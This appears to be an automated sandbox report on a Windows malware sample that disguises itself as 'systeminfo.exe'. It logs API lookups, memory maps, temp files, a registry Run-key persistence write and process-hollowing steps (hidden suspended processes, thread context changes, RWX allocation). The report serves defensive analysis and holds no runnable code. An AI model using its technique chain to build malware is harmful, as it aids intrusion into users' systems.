| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:39, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:44 |
| Information | Value |
|---|---|
| PID | 0xbfc |
| Parent PID | 0xb44 (c:\users\public\3292.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
740
|
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x752a0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x759f0000 |
|
1 | |
| Load | USER32.dll | base_address = 0x75790000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x756e0000 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df76c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df7a4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x3df814 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x3df814 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x3df814 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df814 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x3df814 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = strchr, address_out = 0x752adbeb |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x752a9894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x752a9cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x75aa6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75a01700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x75a2828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75a05929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x75a23102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75a014b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x75a1b6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameExA, address_out = 0x75a842ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75a05a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x75a1eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x757bae5f |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x7570a4b4 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Computer Name | result_out = YKyd69q, type = ComputerNameDnsHostname |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = Local Time, time = 2017-11-28 18:18:22 (Local Time) |
|
6 | |
| Get Time | type = Ticks, time = 103678 |
|
4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
6 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:41, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:42 |
| Information | Value |
|---|---|
| PID | 0x81c |
| Parent PID | 0xbfc (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
3F0
0x
82C
0x
84C
0x
864
0x
874
0x
884
0x
894
0x
8A4
0x
8B4
0x
8C8
0x
788
0x
720
0x
644
0x
51C
0x
968
0x
2AC
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x00081fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0009dfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000adfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000bffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000110000 | 0x00110000 | 0x00117fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000110000 | 0x00110000 | 0x00111fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00127fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| windowsshell.manifest | 0x00120000 | 0x00120fff | Memory Mapped File | Readable |
|
|
|
|
| index.dat | 0x00120000 | 0x0012bfff | Memory Mapped File | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x001c0000 | 0x00226fff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x00230000 | 0x0026bfff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x00230000 | 0x0026bfff | Memory Mapped File | Readable |
|
|
|
|
| index.dat | 0x00230000 | 0x00237fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x00240000 | 0x0024ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000250000 | 0x00250000 | 0x00250fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000370000 | 0x00370000 | 0x00370fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000380000 | 0x00380000 | 0x00380fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x0057efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000590000 | 0x00590000 | 0x0059ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005f0000 | 0x005f0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000600000 | 0x00600000 | 0x00787fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000790000 | 0x00790000 | 0x00910fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000920000 | 0x00920000 | 0x00b1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000920000 | 0x00920000 | 0x00a1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a80000 | 0x00a80000 | 0x00abffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00b1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b80000 | 0x00b80000 | 0x00bbffff | Private Memory | Readable, Writable |
|
|
|
|
| 3292.exe | 0x00be0000 | 0x00bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x01ffffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02000000 | 0x022cefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000022d0000 | 0x022d0000 | 0x026a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022e0000 | 0x022e0000 | 0x0231ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002340000 | 0x02340000 | 0x0237ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023a0000 | 0x023a0000 | 0x0249ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024a0000 | 0x024a0000 | 0x0251ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024a0000 | 0x024a0000 | 0x024dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002510000 | 0x02510000 | 0x0251ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002560000 | 0x02560000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002810000 | 0x02810000 | 0x0290ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002910000 | 0x02910000 | 0x02b3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002930000 | 0x02930000 | 0x02a2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a30000 | 0x02a30000 | 0x02afffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a30000 | 0x02a30000 | 0x02a6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002b00000 | 0x02b00000 | 0x02b3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002b40000 | 0x02b40000 | 0x02c3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02dbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002fa0000 | 0x02fa0000 | 0x02fdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000030d0000 | 0x030d0000 | 0x031cffff | Private Memory | Readable, Writable |
|
|
|
|
| dhcpcsvc.dll | 0x74210000 | 0x74221fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| npmproxy.dll | 0x74230000 | 0x74237fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x74240000 | 0x7424dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netprofm.dll | 0x74250000 | 0x742a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fwpuclnt.dll | 0x742b0000 | 0x742e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x742f0000 | 0x7448dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wship6.dll | 0x744d0000 | 0x744d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wshtcpip.dll | 0x744e0000 | 0x744e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winrnr.dll | 0x744f0000 | 0x744f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mswsock.dll | 0x74500000 | 0x7453bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pnrpnsp.dll | 0x74540000 | 0x74551fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| napinsp.dll | 0x74560000 | 0x7456ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasadhlp.dll | 0x74570000 | 0x74575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nlaapi.dll | 0x74580000 | 0x7458ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sensapi.dll | 0x74590000 | 0x74595fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rtutils.dll | 0x745a0000 | 0x745acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasman.dll | 0x745b0000 | 0x745c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasapi32.dll | 0x745d0000 | 0x74621fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x74650000 | 0x746cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x746e0000 | 0x746e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x746f0000 | 0x7474bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74750000 | 0x7478efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x74790000 | 0x747abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dnsapi.dll | 0x747b0000 | 0x747f3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x74800000 | 0x74850fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winmm.dll | 0x74860000 | 0x74891fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msacm32.dll | 0x748a0000 | 0x748b3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x748c0000 | 0x748c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x74b00000 | 0x74b20fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74b30000 | 0x74b6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x74b70000 | 0x74b85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| userenv.dll | 0x74b90000 | 0x74ba6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74bb0000 | 0x74bbcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x74bc0000 | 0x74bcafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74dc0000 | 0x74dcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74dd0000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x74e30000 | 0x74e8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x74e90000 | 0x74ea8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x74ec0000 | 0x750bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x750c0000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x750d0000 | 0x75126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x75130000 | 0x751bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75250000 | 0x75295fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x752a0000 | 0x7534bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75350000 | 0x75444fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75450000 | 0x755abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x755b0000 | 0x7564cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x75650000 | 0x756d2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x756e0000 | 0x7577ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75780000 | 0x75789fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75790000 | 0x7588ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x75890000 | 0x758c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x758d0000 | 0x759ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759f0000 | 0x75afffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x75b00000 | 0x75bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75c50000 | 0x76899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| normaliz.dll | 0x76b00000 | 0x76b02fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wldap32.dll | 0x76b10000 | 0x76b54fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76b60000 | 0x76beefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76c40000 | 0x76d75fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76d80000 | 0x76e6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076e70000 | 0x76e70000 | 0x76f69fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076f70000 | 0x76f70000 | 0x7708efff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77090000 | 0x77238fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x77240000 | 0x77245fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77270000 | 0x773effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
|
For performance reasons, the remaining 63 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\fb6f.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\fb2f.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\fb70.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\fb70.tmp | 0.11 KB (112 bytes) |
MD5:
36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
|
|
| c:\programdata\fb2f.tmp | 0.08 KB (87 bytes) |
MD5:
0b5111a9cc6baab51851f1702403b937
SHA1: e95885d85bd47cc19e1181b046995ccd975fd59d SHA256: 62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819 |
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 48.00 KB (49152 bytes) |
MD5:
f3393556a7ada08dd53548e19467e11f
SHA1: 6109040bf1ee76ce83597326228dd6ac1668f104 SHA256: f066cb2b19cc806d84ebeb3649da5050070a6e608156c217a5f8d1149ff8dee4 |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB (32768 bytes) |
MD5:
50d06047bd7adf336c6a8dd390506ff3
SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582 SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB (65536 bytes) |
MD5:
009e3e410a28a8e518f2c6ac83306724
SHA1: 121b97b6c22d60d1dedc8d0160c86e8b9afa5089 SHA256: 960f4e97d46b9ddaece01a9def1d6fe466103fa57203483b13c8eb8c26a7b6bc |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\ProgramData\FB6F.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\FB70.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\FB2F.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Temp File | C:\ProgramData\FB2F.tmp | path = C:\ProgramData |
|
1 | |
| Create Temp File | C:\ProgramData\FB70.tmp | path = C:\ProgramData |
|
1 | |
| Create Temp File | C:\ProgramData\FB6F.tmp | path = C:\ProgramData |
|
1 | |
| Get Info | C:\ProgramData\FB70.tmp | type = size |
|
1 | |
| Get Info | C:\ProgramData\FB2F.tmp | type = size |
|
1 | |
| Delete | C:\ProgramData\FB6F.tmp | - |
|
1 | |
| Delete | C:\ProgramData\FB2F.tmp | - |
|
2 | |
| Delete | C:\ProgramData\FB70.tmp | - |
|
2 | |
| Delete | C:\ProgramData\FB6F.tmp | - |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write Value | - | value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ |
|
20 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" | os_pid = 0x674, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" | os_pid = 0xa98, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" | os_pid = 0x66c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x884 |
|
1 | |
| Get Context | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x8b4 |
|
1 | |
| Get Context | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x84c |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x884 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x8b4 |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x84c |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x884 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x8b4 |
|
1 | |
| Resume | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | os_tid = 0x84c |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Allocate | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
